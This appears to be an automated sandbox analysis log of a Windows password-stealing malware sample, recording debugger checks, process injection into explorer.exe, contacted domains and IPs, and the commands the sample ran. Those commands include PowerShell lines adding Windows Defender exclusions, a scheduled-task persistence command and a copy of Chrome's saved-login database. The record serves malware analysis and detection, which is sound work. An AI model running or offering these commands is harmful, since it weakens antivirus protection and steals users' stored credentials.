          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1C06 mov eax, dword ptr fs:[00000030h]10_2_018A1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A1C06 mov eax, dword ptr fs:[00000030h]10_2_018A1C06
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01866C0A mov eax, dword ptr fs:[00000030h]10_2_01866C0A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01866C0A mov eax, dword ptr fs:[00000030h]10_2_01866C0A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01866C0A mov eax, dword ptr fs:[00000030h]10_2_01866C0A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01866C0A mov eax, dword ptr fs:[00000030h]10_2_01866C0A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B8C14 mov eax, dword ptr fs:[00000030h]10_2_018B8C14
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E2CDB mov eax, dword ptr fs:[00000030h]10_2_017E2CDB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181BC2C mov eax, dword ptr fs:[00000030h]10_2_0181BC2C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01813C3E mov eax, dword ptr fs:[00000030h]10_2_01813C3E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01813C3E mov eax, dword ptr fs:[00000030h]10_2_01813C3E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01813C3E mov eax, dword ptr fs:[00000030h]10_2_01813C3E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181A44B mov eax, dword ptr fs:[00000030h]10_2_0181A44B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E4CB0 mov eax, dword ptr fs:[00000030h]10_2_017E4CB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0187C450 mov eax, dword ptr fs:[00000030h]10_2_0187C450
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0187C450 mov eax, dword ptr fs:[00000030h]10_2_0187C450
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B8450 mov eax, dword ptr fs:[00000030h]10_2_018B8450
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F849B mov eax, dword ptr fs:[00000030h]10_2_017F849B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E649B mov eax, dword ptr fs:[00000030h]10_2_017E649B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E649B mov eax, dword ptr fs:[00000030h]10_2_017E649B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180746D mov eax, dword ptr fs:[00000030h]10_2_0180746D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01825C70 mov eax, dword ptr fs:[00000030h]10_2_01825C70
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B477 mov eax, dword ptr fs:[00000030h]10_2_0180B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B477 mov eax, dword ptr fs:[00000030h]10_2_0180B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B477 mov eax, dword ptr fs:[00000030h]10_2_0180B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B477 mov eax, dword ptr fs:[00000030h]10_2_0180B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B477 mov eax, dword ptr fs:[00000030h]10_2_0180B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B477 mov eax, dword ptr fs:[00000030h]10_2_0180B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B477 mov eax, dword ptr fs:[00000030h]10_2_0180B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B477 mov eax, dword ptr fs:[00000030h]10_2_0180B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B477 mov eax, dword ptr fs:[00000030h]10_2_0180B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B477 mov eax, dword ptr fs:[00000030h]10_2_0180B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B477 mov eax, dword ptr fs:[00000030h]10_2_0180B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B477 mov eax, dword ptr fs:[00000030h]10_2_0180B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181AC7B mov eax, dword ptr fs:[00000030h]10_2_0181AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181AC7B mov eax, dword ptr fs:[00000030h]10_2_0181AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181AC7B mov eax, dword ptr fs:[00000030h]10_2_0181AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181AC7B mov eax, dword ptr fs:[00000030h]10_2_0181AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181AC7B mov eax, dword ptr fs:[00000030h]10_2_0181AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181AC7B mov eax, dword ptr fs:[00000030h]10_2_0181AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181AC7B mov eax, dword ptr fs:[00000030h]10_2_0181AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181AC7B mov eax, dword ptr fs:[00000030h]10_2_0181AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181AC7B mov eax, dword ptr fs:[00000030h]10_2_0181AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181AC7B mov eax, dword ptr fs:[00000030h]10_2_0181AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181AC7B mov eax, dword ptr fs:[00000030h]10_2_0181AC7B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E1480 mov eax, dword ptr fs:[00000030h]10_2_017E1480
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B8C75 mov eax, dword ptr fs:[00000030h]10_2_018B8C75
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01867794 mov eax, dword ptr fs:[00000030h]10_2_01867794
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01867794 mov eax, dword ptr fs:[00000030h]10_2_01867794
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01867794 mov eax, dword ptr fs:[00000030h]10_2_01867794
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E6F60 mov eax, dword ptr fs:[00000030h]10_2_017E6F60
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E6F60 mov eax, dword ptr fs:[00000030h]10_2_017E6F60
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FFF60 mov eax, dword ptr fs:[00000030h]10_2_017FFF60
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017EA745 mov eax, dword ptr fs:[00000030h]10_2_017EA745
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FEF40 mov eax, dword ptr fs:[00000030h]10_2_017FEF40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E6730 mov eax, dword ptr fs:[00000030h]10_2_017E6730
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E6730 mov eax, dword ptr fs:[00000030h]10_2_017E6730
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E6730 mov eax, dword ptr fs:[00000030h]10_2_017E6730
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E4F2E mov eax, dword ptr fs:[00000030h]10_2_017E4F2E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E4F2E mov eax, dword ptr fs:[00000030h]10_2_017E4F2E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A17D2 mov eax, dword ptr fs:[00000030h]10_2_018A17D2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018137EB mov eax, dword ptr fs:[00000030h]10_2_018137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018137EB mov eax, dword ptr fs:[00000030h]10_2_018137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018137EB mov eax, dword ptr fs:[00000030h]10_2_018137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018137EB mov eax, dword ptr fs:[00000030h]10_2_018137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018137EB mov eax, dword ptr fs:[00000030h]10_2_018137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018137EB mov eax, dword ptr fs:[00000030h]10_2_018137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018137EB mov eax, dword ptr fs:[00000030h]10_2_018137EB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018097ED mov eax, dword ptr fs:[00000030h]10_2_018097ED
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829860 NtQuerySystemInformation,LdrInitializeThunk,10_2_01829860
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.naspewt.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.mattewigs.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.215.254 80
          Source: C:\Windows\explorer.exeDomain query: www.vestostore.com
          Source: C:\Windows\explorer.exeDomain query: www.ballthingsez.com
          Source: C:\Windows\explorer.exeNetwork Connect: 76.223.26.96 80
          Source: C:\Windows\explorer.exeNetwork Connect: 184.94.215.140 80
          Source: C:\Windows\explorer.exeNetwork Connect: 152.199.21.175 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.149.87.45 80
          Source: C:\Windows\explorer.exeDomain query: www.saleschildcarriers.com
          Source: C:\Windows\explorer.exeDomain query: www.myccsmartmove.com
          Source: C:\Windows\explorer.exeDomain query: www.takealicense.com
          Source: C:\Windows\explorer.exeNetwork Connect: 86.38.202.187 80
          Source: C:\Windows\explorer.exeDomain query: www.dlafluid.com
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1330000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeMemory written: C:\Users\user\AppData\Roaming\hkkRsa.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3324
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hkkRsa.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hkkRsa.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hkkRsa.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmpE41B.tmpJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hkkRsa" /XML "C:\Users\user\AppData\Local\Temp\tmp22F9.tmpJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeProcess created: C:\Users\user\AppData\Roaming\hkkRsa.exe C:\Users\user\AppData\Roaming\hkkRsa.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
          Source: explorer.exe, 0000000F.00000003.575314509.00000000086B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.452267737.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.460990982.0000000005910000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000F.00000000.452267737.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 0000000F.00000000.452267737.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000F.00000000.452267737.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 0000000F.00000000.451928214.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
